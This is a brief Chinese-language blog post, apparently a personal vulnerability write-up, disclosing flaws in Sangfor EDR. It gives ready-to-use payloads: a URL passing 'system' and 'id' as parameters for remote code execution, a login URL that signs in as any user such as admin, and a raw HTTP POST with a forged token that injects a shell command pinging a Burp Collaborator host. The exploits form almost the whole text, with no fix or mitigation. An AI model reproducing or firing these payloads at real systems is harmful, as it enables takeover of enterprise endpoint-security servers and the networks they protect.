RCE

参数位置

https://xxx.com:xxx/tool/log/c.php?strip_slashes=system&host=id

其他几个都没什么用

任意用户登录

参数位置

https://xxx.com:xxx/ui/login.php?user=admin

这里输入任意用户都能登录

PS:

我再交CNVD我就是憨憨，交了一堆全给0分，那我fofa高级会员不是被白嫖了。

9月11日后续补充

RCE

参数位置

POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1
Host: xx.xxx.xx.xx:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
Content-Length: 89
Connection: close

{"params": "w=1\"'test'\"|ping n5tcbkdcgf8hlj7xjc7578yau10soh.burpcollaborator.net"}

只要解码为{md5:true}即可

深信服EDR漏洞

RCE

任意用户登录

9月11日后续补充

RCE

CVE-2020-1472漏洞分析

冰蝎3.0beta2检测

ki9mu